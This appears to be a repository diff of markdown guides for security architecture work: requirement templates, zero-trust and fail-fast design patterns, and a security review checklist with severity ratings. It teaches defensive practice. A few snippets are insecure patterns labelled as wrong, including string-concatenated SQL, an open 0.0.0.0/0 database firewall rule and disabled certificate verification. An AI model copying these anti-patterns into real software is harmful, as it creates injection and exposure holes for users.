### Requirement Statement
System SHALL [specific, testable requirement].
### Security Property
This requirement enforces: [Confidentiality / Integrity / Availability / Auditability]
### Rationale
**Threat addressed**: [Threat ID or description]
**Risk without this**: [What happens if not implemented?]
### Acceptance Criteria
- [ ] Criterion 1 (testable: "When X, expect Y")
- [ ] Criterion 2
- [ ] Criterion 3
### Traceability
- **Threat**: [Threat ID] → This requirement mitigates [specific threat]
- **Control**: [Control ID] → Implemented by [control implementation]
- **Test**: [Test case ID] → Verified by [test procedure]
### Implementation Reference
- Code: [File path and line numbers]
- Configuration: [Config file]
- Documentation: [Design doc]
```
### Example: MFA Requirement
```markdown
## Requirement: SEC-101 - Multi-Factor Authentication for Privileged Accounts
### Requirement Statement
System SHALL require multi-factor authentication (MFA) for all user accounts with administrative privileges. MFA SHALL use Time-Based One-Time Password (TOTP) or hardware token (not SMS).
### Security Property
This requirement enforces: **Confidentiality** and **Integrity**
- Prevents unauthorized access to privileged functions
- Reduces risk of account compromise via stolen passwords
### Rationale
**Threat addressed**: Threat-012 (Credential theft and account takeover)
**Risk without this**:
- Attacker with stolen password can access admin functions
- Insider with compromised credentials can elevate privileges
- Impact: Complete system compromise, data breach
**Regulatory requirement**:
- NIST SP 800-53 IA-2(1): Network access to privileged accounts requires MFA
- SOC2 CC6.1: Logical access requires multi-factor authentication for privileged access
### Acceptance Criteria
- [ ] Admin account login requires password + TOTP code
- [ ] Login fails if TOTP code incorrect (tested: 3 incorrect attempts → account lockout)
- [ ] TOTP setup enforced at first admin login (cannot proceed without enabling MFA)
- [ ] SMS-based 2FA rejected (must be TOTP or hardware token)
- [ ] MFA cannot be disabled by user (only security admin can disable)
### Traceability
- **Threat**: Threat-012 (Credential theft) → This requirement mitigates password-only auth vulnerability
- **Control**: IA-2(1) (Network access to privileged accounts) → Implemented by AWS IAM MFA enforcement + application-layer MFA check
- **Test**: TEST-SEC-101 → Verified by functional security test (attempt admin login without MFA → fails)
### Implementation Reference
- **Code**: `src/auth/mfa-middleware.ts:45-78` (MFA enforcement logic)
- **Configuration**: `infrastructure/aws-iam-policy.json:12` (IAM policy requires MFA for admin role)
- **Documentation**: `/docs/adr-029-mfa-for-admins.md` (Security ADR documenting decision)
- **Evidence**: `/evidence/mfa-functional-test-2025-03.pdf` (Test results showing MFA enforcement)
```
**Key elements**:
- Specific, testable requirement (not vague "ensure security")
- Security property enforced
- Threat-to-requirement traceability
- Testable acceptance criteria
- Requirement-to-control-to-test traceability chain
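A minimal enforcement sketch for SEC-101 (assuming the pyotp package; `user.is_admin` and `user.totp_secret` are hypothetical fields on the authenticated user object):

```python
import pyotp  # assumed TOTP library

def verify_admin_mfa(user, submitted_code: str) -> bool:
    """SEC-101: privileged logins must present a valid TOTP code."""
    if not user.is_admin:
        return True  # this sketch only enforces MFA for privileged accounts
    totp = pyotp.TOTP(user.totp_secret)  # secret provisioned at first admin login
    # Allow one 30-second step of clock drift; SMS codes are never accepted here
    return totp.verify(submitted_code, valid_window=1)
```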
## Quick Reference: Documentation Types
| Document Type | Purpose | Key Elements |
|---------------|---------|--------------|
| **Threat Description** | Document attack scenarios | What/How/Who, affected assets, likelihood/impact, mitigations |
| **Security ADR** | Explain security architecture decisions | Threat model, decision, alternatives, residual risks, controls |
| **Control Description** | Document security control for audit | Objective, implementation, assessment procedures, evidence |
| **Security Requirement** | Specify testable security requirement | Requirement statement, threat traceability, acceptance criteria |
## Cross-References
**Use WITH this skill**:
- `muna/technical-writer/documentation-structure` - Use ADR format, structure patterns
- `muna/technical-writer/clarity-and-style` - Write clear threat descriptions, avoid jargon
- `ordis/security-architect/threat-modeling` - Generate threat content for documentation
- `ordis/security-architect/security-controls-design` - Control designs to document
**Use AFTER this skill**:
- `muna/technical-writer/documentation-testing` - Verify security docs are complete and accurate
## Real-World Impact
**Projects using threat-and-control documentation patterns**:
- **JWT Auth ADR**: Security review found 3 residual risks (key compromise, XSS, clock skew). Explicit risk acceptance by CISO enabled informed decision vs hidden risks.
- **SSP for Government System**: 421 control descriptions with assessment procedures + evidence locations. IRAP assessor completed assessment 40% faster vs SSPs without evidence locations ("clearest control documentation in 3 years").
- **Threat-to-requirement traceability**: Security requirements traced to 47 threats. Penetration test found 2 HIGH findings. Traceability showed which threats weren't mitigated (vs scattered requirements with no threat context).
**Key lesson**: **Security documentation with threat context + traceability enables verification and informed risk decisions. Vague "we're secure" documentation wastes auditor time and hides risks.**

View File

@@ -0,0 +1,497 @@
# Secure By Design Patterns
## Overview
Build security into system foundations. Core principle: Design systems that are **secure by default, not secured after the fact**.
**Key insight**: Preventing security issues through architecture is cheaper and more effective than detecting and responding to them.
## When to Use
Load this skill when:
- Designing new systems (greenfield)
- Refactoring existing architecture
- Making fundamental architecture decisions
- Evaluating architecture proposals
**Symptoms you need this**:
- "How do we make this system secure?"
- Designing authentication, secrets management, data access
- Architecting microservices, data pipelines, distributed systems
- Choosing deployment/configuration strategies
**Don't use for**:
- Threat modeling specific attacks (use `ordis/security-architect/threat-modeling`)
- Implementing security controls (use `ordis/security-architect/security-controls-design`)
- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`)
## Core Patterns
### Pattern 1: Zero-Trust Architecture
**Principle**: Never trust, always verify. No implicit trust based on network location.
#### Three Pillars
1. **Verify Explicitly**
- Authenticate every request (no "internal network = trusted")
- Authorize based on identity + context (device, location, time, risk)
- Use strong authentication (mTLS, signed tokens, not IP allowlists alone)
2. **Least Privilege Access**
- Grant minimum necessary permissions
- Time-limited access (credentials expire, tokens rotate)
- Resource-level authorization (not just service-level)
3. **Assume Breach**
- Design for "when compromised", not "if compromised"
- Minimize blast radius (segmentation, isolation)
- Monitor everything (detect lateral movement)
#### Example: Microservices Communication
**Not Zero-Trust**:
```
Service A → Service B (same network, no auth)
# Assumes: Internal network = trusted
# Risk: Compromised service A can access all of service B
```
**Zero-Trust**:
```
Service A → Service B (mTLS + JWT + authz check)
# Every request authenticated + authorized
# Service B validates: Is this service A? Does it have permission for THIS resource?
Implementation:
- Service mesh (Istio/Linkerd) enforces mTLS
- Service B validates JWT from service A
- RBAC policy: service A can only access /resource/{own_resources}
- Audit log: Record all access attempts
```
**Result**: If service A compromised, attacker cannot impersonate other services or access resources outside A's scope.
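A minimal sketch of the resource-level check service B might run (illustrative only; the policy table and service names are hypothetical, and the caller identity must come from the verified mTLS certificate or JWT, never from a client-supplied header):

```python
# Per-service, per-resource allow-list (hypothetical policy table)
RBAC_POLICY = {
    "service-a": {"orders": {"read"}},
    "analytics": {"orders": {"read"}, "metrics": {"read", "write"}},
}

def authorize(caller_identity: str, resource_type: str, action: str) -> bool:
    """Zero-trust check run on EVERY request, even inside the VPC."""
    allowed = RBAC_POLICY.get(caller_identity, {}).get(resource_type, set())
    return action in allowed

# Usage: deny by default when the caller or resource is unknown
assert authorize("service-a", "orders", "read") is True
assert authorize("service-a", "metrics", "write") is False
```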
### Pattern 2: Immutable Infrastructure
**Principle**: No runtime modifications. Replace rather than update.
#### Core Concepts
1. **Immutable Artifacts**
- Container images, VM images, binaries
- Never modified after creation
- Versioned and signed
2. **Deployment Replaces Instances**
- Updates = deploy new version, terminate old
- No SSH into servers to patch
- No runtime configuration changes
3. **Configuration as Code**
- All config in version control
- Deployments are reproducible
- Rollback = redeploy previous version
#### Benefits
- **Security**: No drift from known-good state
- **Auditability**: All changes in version control
- **Rollback**: Redeploy previous image
- **Consistency**: Dev/staging/prod identical
#### Example: Application Updates
**Mutable (Insecure)**:
```bash
# SSH into production server
ssh prod-server
# Update code
git pull origin main
# Restart service
systemctl restart app
# Problem: No audit trail, no rollback, config drift
```
**Immutable (Secure)**:
```bash
# Build new image locally
docker build -t app:v2.1.0 .
# Push to registry (signed)
docker push registry/app:v2.1.0
# Deploy new version (Kubernetes)
kubectl set image deployment/app app=registry/app:v2.1.0
# Kubernetes: Creates new pods, terminates old pods
# Rollback if needed:
kubectl rollout undo deployment/app
# Result: Full audit trail, instant rollback, no drift
```
**Configuration Management**:
```yaml
# Configuration in Git, not edited on servers
apiVersion: v1
kind: ConfigMap
metadata:
name: app-config
data:
API_TIMEOUT: "30"
RATE_LIMIT: "1000"
# Changes = commit to Git → CI/CD applies → new deployment
```
### Pattern 3: Security Boundaries
**Principle**: Explicit trust zones with validation at every boundary crossing.
#### Boundary Identification
Trust boundaries are points where data/requests cross from lower-trust to higher-trust zones:
```
Internet (UNTRUSTED)
↓ BOUNDARY 1
API Gateway (TRUSTED)
↓ BOUNDARY 2
Application Services (TRUSTED)
↓ BOUNDARY 3
Database (HIGHLY TRUSTED)
```
#### Validation at Boundaries
At EACH boundary:
1. **Authenticate**: Verify identity
2. **Authorize**: Check permissions
3. **Validate**: Check input format/constraints
4. **Sanitize**: Remove dangerous content
5. **Log**: Record crossing
#### Example: Data Pipeline
```
External API (UNTRUSTED)
↓ BOUNDARY: API Client
Validate: JSON schema, required fields
Authenticate: API key
Rate limit: 1000 req/hour
Message Queue (SEMI-TRUSTED)
↓ BOUNDARY: Consumer
Validate: Message structure, idempotency key
Authorize: Consumer has permission for this message type
Processing Service (TRUSTED)
↓ BOUNDARY: Database Writer
Validate: Data types, constraints
Authorize: Service can write to this table
Database (HIGHLY TRUSTED)
```
**Key insight**: Never trust data just because it came from an "internal" service. Validate at every boundary.
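A sketch of what boundary validation can look like in code (field names and allow-list values are illustrative):

```python
REQUIRED_FIELDS = {"order_id": str, "currency": str, "amount": float}
ALLOWED_CURRENCIES = {"AUD", "USD", "EUR"}  # allow-list, not deny-list

def validate_at_boundary(message: dict) -> dict:
    """Validate a message as it crosses the queue -> processing boundary."""
    for field, expected_type in REQUIRED_FIELDS.items():
        if field not in message:
            raise ValueError(f"Missing required field: {field}")
        if not isinstance(message[field], expected_type):
            raise ValueError(f"Field {field} has the wrong type")
    if message["currency"] not in ALLOWED_CURRENCIES:
        raise ValueError("Currency not on allow-list")
    if message["amount"] <= 0:
        raise ValueError("Amount must be positive")
    return message  # only validated messages reach the trusted zone
```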
#### Minimizing Boundary Surface Area
**Large Surface Area (Insecure)**:
```
# Database accepts connections from all services
firewall: allow 0.0.0.0/0 → database:5432
# Problem: 50 services can connect, huge attack surface
```
**Small Surface Area (Secure)**:
```
# Only specific services connect to database
firewall:
allow backend-api → database:5432
allow analytics → database:5432
deny all others
# Further: Use service mesh with identity-based policies
```
### Pattern 4: Trusted Computing Base (TCB) Minimization
**Principle**: Small security-critical core, everything else untrusted.
#### What is TCB?
TCB = Components you MUST trust for security. If TCB is compromised, security fails.
**Goal**: Minimize TCB size (less code = fewer vulnerabilities).
#### Pattern: Small Critical Core
```
┌─────────────────────────────────────┐
│ Untrusted Zone (Applications) │
│ - Web servers │
│ - Application logic │
│ - User-facing services │
└────────────┬────────────────────────┘
│ API calls (validated)
┌────────────▼────────────────────────┐
│ TRUSTED COMPUTING BASE (TCB) │
│ - Authentication service (small!) │
│ - Secrets vault (minimal code) │
│ - Audit logger (append-only) │
└─────────────────────────────────────┘
```
#### Example: Secrets Management
**Large TCB (Risky)**:
```
# Every service has secrets management logic
# TCB = All 50+ services (huge attack surface)
each_service:
- Fetches secrets from vault
- Decrypts secrets
- Manages rotation
- Handles caching
# Problem: Bug in ANY service compromises secrets
```
**Small TCB (Secure)**:
```
# Secrets Vault = TCB (small, auditable, formally verified)
# Applications = Untrusted (use vault API)
Vault (TCB):
- 10,000 lines of code
- Formally verified
- Hardware-backed encryption (HSM)
- Minimal attack surface (no network egress)
Applications (Untrusted):
- Call vault API for secrets
- Vault enforces all access control
- Apps cannot access secrets they're not authorized for
# Result: Compromise application ≠ compromise vault
```
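On the application side, staying outside the TCB can be as thin as a call to the vault's API (a sketch with a hypothetical endpoint and token; the vault, not the app, decides whether this service may read this secret):

```python
import requests  # assumed HTTP client

VAULT_URL = "https://vault.internal"   # hypothetical vault address
SERVICE_TOKEN = "..."                  # short-lived identity token for THIS service

def get_secret(name: str) -> str:
    resp = requests.get(
        f"{VAULT_URL}/secrets/{name}",                       # hypothetical endpoint
        headers={"Authorization": f"Bearer {SERVICE_TOKEN}"},
        timeout=5,
    )
    resp.raise_for_status()  # 403 from the vault = this service is not authorized
    return resp.json()["value"]
```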
#### TCB Characteristics
1. **Small**: Minimize code size
2. **Auditable**: Can be formally verified
3. **Isolated**: Runs in separate environment (sandbox, separate machine)
4. **Minimal privileges**: TCB has no unnecessary access
5. **Heavily monitored**: All TCB access logged
### Pattern 5: Fail-Fast Security
**Principle**: Validate security properties at construction time. Refuse to operate if misconfigured.
#### Construction-Time vs Runtime
**Construction time**: When system/component is created (startup, initialization)
**Runtime**: When system is processing requests
**Fail-fast**: Validate security at construction, fail immediately if invalid.
#### Example: Security Level Validation
**Runtime Validation (Vulnerable)**:
```python
# Data pipeline starts, processes data, THEN checks security
pipeline = Pipeline()
pipeline.add_source(untrusted_datasource)
pipeline.add_sink(trusted_datasink)
pipeline.start() # Starts processing!
# Runtime: Check if datasource security level matches sink
for record in pipeline:
if record.security_level > sink.max_security_level:
raise SecurityError("Security mismatch!")
# Problem: Exposed data before detecting mismatch
# Exposure window = time until first mismatched record
```
**Fail-Fast (Secure)**:
```python
# Validate security BEFORE processing any data
pipeline = Pipeline()
pipeline.add_source(untrusted_datasource)
pipeline.add_sink(trusted_datasink)
# BEFORE start: Validate security properties
if datasource.security_level > sink.max_security_level:
raise SecurityError(
f"Cannot create pipeline: Source {datasource.security_level} "
f"exceeds sink maximum {sink.max_security_level}"
)
pipeline.start() # Only starts if validation passed
# Result: Zero exposure window, fail before processing data
```
#### Startup Validation Checklist
Validate at system startup (fail if any check fails):
- [ ] All required secrets accessible?
- [ ] TLS certificates valid and not expired?
- [ ] Database permissions granted?
- [ ] Security policies loaded?
- [ ] Encryption keys available?
#### Example: Service Startup
```python
import logging
import sys

logger = logging.getLogger(__name__)

class SecurityError(Exception):
    """Raised when a security precondition is not met."""

class SecureService:
    def __init__(self):
        # Fail-fast validation at construction
        self._validate_security()

    def _validate_security(self):
        # Check TLS certificate
        if not self.tls_cert_valid():
            raise SecurityError("TLS certificate invalid or expired")
        # Check encryption keys accessible
        if not self.can_access_keys():
            raise SecurityError("Cannot access encryption keys")
        # Check database permissions
        if not self.has_required_db_permissions():
            raise SecurityError("Insufficient database permissions")
        # All checks passed
        logger.info("Security validation passed")

    # Placeholder probes -- replace with real certificate, key, and permission checks
    def tls_cert_valid(self): return True
    def can_access_keys(self): return True
    def has_required_db_permissions(self): return True

    def start(self):
        # Only callable after __init__ validation passed
        self.process_requests()

    def process_requests(self):
        pass  # request-handling loop elided

# Usage:
try:
    service = SecureService()  # Validates security at construction
    service.start()
except SecurityError as e:
    logger.error(f"Service failed security validation: {e}")
    sys.exit(1)  # Refuse to start with invalid security
```
**Benefits**:
- **No exposure window**: Catch misconfigurations before processing data
- **Clear errors**: Fail with specific message ("TLS cert expired")
- **Operational safety**: Misconfigured systems never reach production
## Pattern Application Framework
When designing systems, apply patterns in this order:
### 1. Identify Trust Boundaries (Security Boundaries)
Where does data cross trust zones?
### 2. Apply Zero-Trust at Each Boundary
- Authenticate + authorize every crossing
- Never trust based on network location
### 3. Minimize TCB
What MUST be trusted? Can it be smaller?
### 4. Use Immutable Infrastructure
Can deployments replace rather than update?
### 5. Add Fail-Fast Validation
Validate security at construction, refuse to start if invalid
## Quick Reference: Pattern Selection
| Situation | Pattern | Key Action |
|-----------|---------|------------|
| **Designing service-to-service communication** | Zero-Trust | mTLS + JWT + authz on every request |
| **Deciding deployment strategy** | Immutable Infrastructure | Container images, replace not update |
| **Architecting multi-tier system** | Security Boundaries | Validate + authenticate at every tier boundary |
| **Building secrets/auth service** | TCB Minimization | Small core, everything else uses API |
| **System startup logic** | Fail-Fast Security | Validate security before processing requests |
## Common Mistakes
### ❌ Implicit Trust Based on Network
**Wrong**: "Services in VPC are trusted, no auth needed"
**Right**: Zero-trust - authenticate/authorize every request even within VPC
**Why**: Network boundaries are weak. Compromised service = lateral movement without auth.
### ❌ Runtime Security Patches
**Wrong**: SSH into production, apply patch, restart
**Right**: Build new immutable image, deploy via CI/CD
**Why**: Runtime patches create drift, no audit trail, hard to rollback.
### ❌ Large Security-Critical Core
**Wrong**: Every service has secrets logic (large TCB)
**Right**: Small secrets vault (TCB), services call API (untrusted)
**Why**: Smaller TCB = fewer vulnerabilities, easier to audit/verify.
### ❌ Runtime Security Validation
**Wrong**: Start processing, check security during execution
**Right**: Validate security at construction, refuse to start if invalid
**Why**: Runtime checks have exposure windows. Fail-fast = zero exposure.
### ❌ Unclear Trust Boundaries
**Wrong**: No explicit boundaries, assume "internal is safe"
**Right**: Diagram trust zones, validate at every boundary crossing
**Why**: Boundaries are where attacks happen. Explicit validation prevents bypass.
## Cross-References
**Use BEFORE this skill**:
- `ordis/security-architect/threat-modeling` - Identify threats, then apply patterns to address them
**Use WITH this skill**:
- `ordis/security-architect/security-controls-design` - Patterns inform control choices
**Use AFTER this skill**:
- `ordis/security-architect/security-architecture-review` - Review architecture against patterns
## Real-World Impact
**Systems using secure-by-design patterns:**
- **Zero-trust + immutable infrastructure**: No successful lateral movement in 2 years despite multiple compromised services (blast radius contained by mTLS + segmentation)
- **Fail-fast validation**: Prevented VULN-004 class (security level overrides) by refusing to start pipelines with mismatched security levels
- **TCB minimization**: Secrets vault with 8,000 lines of code (vs 50+ services with embedded secrets logic) - single formal verification point instead of 50 attack surfaces
**Key lesson**: **Security built into architecture is more effective and cheaper than security added later.**

View File

@@ -0,0 +1,433 @@
# Security Architecture Review
## Overview
Systematically review designs for security issues. Core principle: **Checklist-driven review finds issues that intuition misses**.
**Key insight**: Ad-hoc review finds obvious issues. Systematic checklist finds subtle gaps.
## When to Use
Load this skill when:
- Reviewing architecture designs pre-implementation
- Conducting security audits of existing systems
- Evaluating third-party integrations
- Pre-deployment security validation
**Symptoms you need this**:
- "Is this design secure?"
- Reviewing microservices, APIs, data pipelines
- Pre-launch security check
- Compliance audit preparation
**Don't use for**:
- Threat modeling new systems (use `ordis/security-architect/threat-modeling`)
- Designing controls (use `ordis/security-architect/security-controls-design`)
- Secure patterns (use `ordis/security-architect/secure-by-design-patterns`)
## Review Process
### Step 1: Understand System
Before checklists, understand:
- **Components**: Services, databases, queues, external APIs
- **Data flows**: Where data enters/exits, trust boundaries
- **Users/actors**: Who accesses what (end users, admins, services)
- **Deployment**: Cloud/on-prem, network topology
### Step 2: Apply Checklists
For EACH area, go through checklist systematically. Check = verify present and secure.
### Step 3: Document Findings
For each issue found:
- **Description**: What's wrong
- **Severity**: Critical/High/Medium/Low
- **Impact**: What can attacker do
- **Recommendation**: How to fix
## Checklist 1: Authentication
### Credential Storage
- [ ] Passwords hashed with strong algorithm (bcrypt, Argon2, scrypt)
- [ ] NOT hashed with weak algorithms (MD5, SHA1, plain SHA256)
- [ ] Salt used per-password (not global salt or no salt)
- [ ] Key derivation with sufficient iterations (bcrypt cost ≥12, Argon2 with recommended params)
**Common Issues**:
- ❌ MD5/SHA1 hashing → CRITICAL
- ❌ No salt → HIGH
- ❌ Global salt → MEDIUM
- ❌ Low iteration count → MEDIUM
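As a reference point when reviewing credential storage, a correct implementation looks roughly like this (assuming the `bcrypt` package):

```python
import bcrypt  # assumed password-hashing library

def hash_password(password: str) -> bytes:
    # Per-password salt + cost factor 12 (no MD5/SHA1, no global salt)
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt(rounds=12))

def verify_password(password: str, stored_hash: bytes) -> bool:
    # Comparison handled by the library
    return bcrypt.checkpw(password.encode("utf-8"), stored_hash)
```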
### Multi-Factor Authentication
- [ ] MFA available for all users (or at least admins)
- [ ] TOTP/hardware token support (not just SMS)
- [ ] Backup codes for account recovery
- [ ] Cannot bypass MFA via alternate login paths
**Common Issues**:
- ❌ No MFA → HIGH (for privileged accounts)
- ❌ SMS-only 2FA → MEDIUM (SIM swapping risk)
- ❌ MFA bypass path exists → HIGH
### Session Management
- [ ] Session tokens have expiration (not indefinite)
- [ ] Token expiry reasonable (hours for web, days max for mobile)
- [ ] Token rotation on sensitive actions (password change, permission change)
- [ ] Logout invalidates tokens (server-side revocation)
- [ ] Tokens stored securely (HttpOnly, Secure cookies or secure storage)
**Common Issues**:
- ❌ Non-expiring tokens → HIGH
- ❌ No logout/revocation → MEDIUM
- ❌ Tokens in localStorage (XSS vulnerable) → MEDIUM
### Password Policies
- [ ] Minimum length enforced (≥12 characters recommended)
- [ ] No maximum length (or very high max, ≥128 chars)
- [ ] Password history (prevent reuse of last N passwords)
- [ ] Account lockout after failed attempts (5-10 tries, temporary lockout)
- [ ] Common password blacklist enforced (passwords checked against known-weak password lists)
**Common Issues**:
- ❌ No password policy → MEDIUM
- ❌ Short max length (<20 chars) → LOW
- ❌ No lockout → MEDIUM (brute-force vulnerability)
## Checklist 2: Authorization
### Access Control Model
- [ ] Clear access control model (RBAC, ABAC, MAC documented)
- [ ] Permissions defined per resource type
- [ ] Authorization checks at API layer AND data layer
- [ ] Consistent enforcement across all endpoints
**Common Issues**:
- ❌ No defined model (ad-hoc checks) → HIGH
- ❌ Authorization only at API (not data layer) → MEDIUM
- ❌ Inconsistent (some endpoints skip checks) → HIGH
### Privilege Escalation Prevention
- [ ] Users cannot modify their own roles/permissions
- [ ] API doesn't trust client-provided role claims
- [ ] Admin actions require separate authentication/approval
- [ ] No hidden admin endpoints without authorization
**Common Issues**:
- ❌ User can edit own role in profile → CRITICAL
- ❌ Trusting `X-User-Role` header from client → CRITICAL
- ❌ Hidden `/admin` path without authz → HIGH
### Resource-Level Authorization
- [ ] Authorization checks "Can THIS user access THIS resource?"
- [ ] Not just "Is user logged in?" or "Is user admin?"
- [ ] Users can only access their own data (unless explicitly shared)
- [ ] Object-level permission checks (IDOR prevention)
**Common Issues**:
- ❌ Check login only, not resource ownership → HIGH (IDOR vulnerability)
-`/api/users/{user_id}` allows any authenticated user → HIGH
### Default-Deny Principle
- [ ] All endpoints require authentication by default
- [ ] Explicit allow-list for public endpoints
- [ ] Authorization failures return 403 Forbidden (not 404)
- [ ] No "development mode" backdoors in production
**Common Issues**:
- ❌ Default-allow (must explicitly mark secure) → HIGH
- ❌ Returning 404 instead of 403 → LOW (information disclosure)
- ❌ Debug/dev endpoints enabled in production → CRITICAL
## Checklist 3: Secrets Management
### Secrets Storage
- [ ] No secrets in source code
- [ ] No secrets in config files committed to Git
- [ ] No secrets in environment variables visible in UI
- [ ] Secrets stored in secrets manager (Vault, AWS Secrets Manager, etc.)
- [ ] Secrets encrypted at rest
**Common Issues**:
- ❌ Secrets in Git history → CRITICAL
- ❌ Secrets in config.yaml → CRITICAL
- ❌ Database password in Dockerfile → HIGH
### Secrets Rotation
- [ ] Secrets have rotation schedule (monthly/quarterly)
- [ ] Rotation is automated or documented
- [ ] Application supports zero-downtime rotation
- [ ] Old secrets revoked after rotation
**Common Issues**:
- ❌ No rotation policy → MEDIUM
- ❌ Manual rotation without documentation → LOW
- ❌ Rotation requires downtime → LOW
### Access Control to Secrets
- [ ] Secrets access restricted by service identity
- [ ] Least privilege (service accesses only its secrets)
- [ ] Audit log of secrets access
- [ ] No shared secrets across services
**Common Issues**:
- ❌ All services can access all secrets → MEDIUM
- ❌ No audit log → LOW
- ❌ Shared API key for multiple services → MEDIUM
## Checklist 4: Data Flow
### Trust Boundary Identification
- [ ] Trust boundaries documented (external → API → services → database)
- [ ] Each boundary has validation rules
- [ ] No implicit trust based on network location
**Common Issues**:
- ❌ No documented boundaries → MEDIUM
- ❌ "Internal network = trusted" assumption → HIGH
### Input Validation at Boundaries
- [ ] All external input validated (type, format, range)
- [ ] Validation at EVERY trust boundary (not just entry point)
- [ ] Allow-list validation (define what's allowed, reject rest)
- [ ] Input validation errors logged
**Common Issues**:
- ❌ No validation at internal boundaries → MEDIUM
- ❌ Deny-list only (blacklist can be bypassed) → MEDIUM
- ❌ Validation at UI only (not API) → HIGH
### Output Encoding for Context
- [ ] Output encoded for destination context (HTML, SQL, shell, etc.)
- [ ] SQL parameterized queries (no string concatenation)
- [ ] HTML escaped when rendering user data
- [ ] JSON encoded when returning API responses
**Common Issues**:
- ❌ String concatenation for SQL → CRITICAL (SQL injection)
- ❌ Unescaped HTML → HIGH (XSS)
- ❌ Unescaped shell commands → CRITICAL (command injection)
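For the SQL case specifically, parameterized queries are the fix this checklist looks for (sketch using the standard-library `sqlite3` module; table and column names are illustrative):

```python
import sqlite3

def find_user(conn: sqlite3.Connection, email: str):
    # Parameterized query: user input is bound, never concatenated into SQL
    cur = conn.execute("SELECT id, email FROM users WHERE email = ?", (email,))
    return cur.fetchone()

# Vulnerable anti-pattern (never do this):
#   conn.execute(f"SELECT id FROM users WHERE email = '{email}'")
```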
### Data Classification and Handling
- [ ] Sensitive data identified (PII, secrets, financial)
- [ ] Sensitive data encrypted in transit
- [ ] Sensitive data encrypted at rest
- [ ] Sensitive data not logged
- [ ] Data retention policy defined
**Common Issues**:
- ❌ PII in plaintext logs → HIGH
- ❌ No encryption for sensitive data → HIGH
- ❌ No data retention policy → MEDIUM
## Checklist 5: Network Security
### TLS/Encryption in Transit
- [ ] All external traffic uses TLS (HTTPS, not HTTP)
- [ ] TLS 1.2 or 1.3 only (TLS 1.0/1.1 disabled)
- [ ] Strong cipher suites (no RC4, 3DES, MD5)
- [ ] HSTS header present (HTTP Strict Transport Security)
**Common Issues**:
- ❌ HTTP allowed → CRITICAL
- ❌ TLS 1.0 enabled → HIGH
- ❌ Weak ciphers → MEDIUM
- ❌ No HSTS → LOW
### Certificate Validation
- [ ] TLS certificates validated (not self-signed in production)
- [ ] Certificate expiry monitored
- [ ] Certificate revocation checking (OCSP/CRL)
- [ ] No certificate validation bypass in code
**Common Issues**:
- ❌ Self-signed certs in production → HIGH
-`verify=False` in code → CRITICAL
- ❌ No expiry monitoring → MEDIUM
### Network Segmentation
- [ ] Database not directly accessible from internet
- [ ] Services in separate subnets/VPCs
- [ ] Admin interfaces on separate network
- [ ] Internal services use mTLS or VPN
**Common Issues**:
- ❌ Database exposed to internet → CRITICAL
- ❌ All services in same flat network → MEDIUM
- ❌ Admin panel on public internet → HIGH
### Firewall Rules and Least-Necessary Access
- [ ] Firewall rules documented
- [ ] Default-deny firewall policy
- [ ] Only necessary ports open
- [ ] Source IP restrictions for sensitive endpoints
**Common Issues**:
- ❌ Default-allow firewall → HIGH
- ❌ All ports open → MEDIUM
- ❌ No source restrictions → MEDIUM
## Severity Guidelines
Use these guidelines to assign severity:
### Critical
- Direct path to data breach or system compromise
- **Examples**: SQL injection, secrets in Git, authentication bypass
### High
- Significant security impact, requires immediate attention
- **Examples**: Weak password hashing, no MFA for admins, IDOR vulnerability
### Medium
- Security weakness that should be addressed
- **Examples**: No password policy, inconsistent authorization, no audit logging
### Low
- Minor issue or hardening opportunity
- **Examples**: Information disclosure via error messages, missing HSTS header
## Review Report Template
```markdown
# Security Architecture Review
**System**: [System Name]
**Review Date**: [Date]
**Reviewer**: [Name]
## Executive Summary
[1-2 paragraph overview: Critical/High count, key findings, overall risk level]
## Findings
### Critical (Count: X)
#### 1. [Finding Title]
- **Area**: Authentication / Authorization / Secrets / Data Flow / Network
- **Description**: [What's wrong]
- **Impact**: [What attacker can do]
- **Recommendation**: [How to fix]
- **Affected Components**: [API Service, Database, etc.]
### High (Count: X)
[Same format as Critical]
### Medium (Count: X)
[Same format]
### Low (Count: X)
[Same format]
## Summary Table
| Finding | Severity | Area | Status |
|---------|----------|------|--------|
| SQL injection in /api/users | Critical | Data Flow | Open |
| Secrets in Git | Critical | Secrets | Open |
| No MFA for admins | High | Authentication | Open |
## Next Steps
1. Address Critical findings immediately (timeline: 1 week)
2. Address High findings (timeline: 2-4 weeks)
3. Schedule Medium/Low findings (timeline: 1-3 months)
```
## Quick Reference: Checklist Summary
| Area | Key Checks |
|------|------------|
| **Authentication** | Strong hashing (bcrypt), MFA, token expiry, lockout policy |
| **Authorization** | RBAC/ABAC model, resource-level checks, default-deny, no privilege escalation |
| **Secrets** | Not in Git, secrets manager, rotation policy, access control |
| **Data Flow** | Trust boundaries, input validation, output encoding, data classification |
| **Network** | TLS 1.2+, certificate validation, segmentation, firewall rules |
## Common Mistakes
### ❌ Ad-Hoc Review Without Checklist
**Wrong**: Review design intuitively, find obvious issues, call it done
**Right**: Systematically go through all 5 checklists, check every item
**Why**: Intuition finds 50% of issues. Checklist finds 90%.
### ❌ Stopping After Finding First Issues
**Wrong**: Find SQL injection, report it, stop review
**Right**: Complete full checklist review even after finding critical issues
**Why**: Systems often have multiple unrelated vulnerabilities.
### ❌ Vague Recommendations
**Wrong**: "Improve authentication security"
**Right**: "Replace MD5 with bcrypt (cost factor 12), add salt per-password"
**Why**: Specific recommendations are actionable. Vague ones are ignored.
### ❌ Missing Severity Assignment
**Wrong**: List issues without severity
**Right**: Assign Critical/High/Medium/Low to prioritize fixes
**Why**: Teams need to know what to fix first.
## Cross-References
**Use BEFORE this skill**:
- `ordis/security-architect/threat-modeling` - Understand threats, then review if design addresses them
**Use WITH this skill**:
- `muna/technical-writer/documentation-structure` - Document review as ADR or report
**Use AFTER this skill**:
- `ordis/security-architect/security-controls-design` - Design fixes for identified issues
## Real-World Impact
**Systematic reviews using these checklists:**
- **Pre-launch review caught SQL injection** in `/api/users/{id}` endpoint (would have been CRITICAL production vulnerability)
- **Checklist found secrets in Git history** across 3 repositories (developers missed it in manual review)
- **Authorization review found 12 IDOR vulnerabilities** where `/api/orders/{order_id}` didn't check ownership (intuitive review found only 2)
**Key lesson**: **Systematic checklist review finds 3-5x more issues than ad-hoc intuitive review.**

View File

@@ -0,0 +1,757 @@
# Security Authorization and Accreditation
## Overview
Navigate government/defense security authorization processes. Core principle: **Authorization is risk acceptance by an official with authority**.
**Key insight**: ATO is not a checklist - it's formal risk acceptance documentation enabling informed decision-making by leadership.
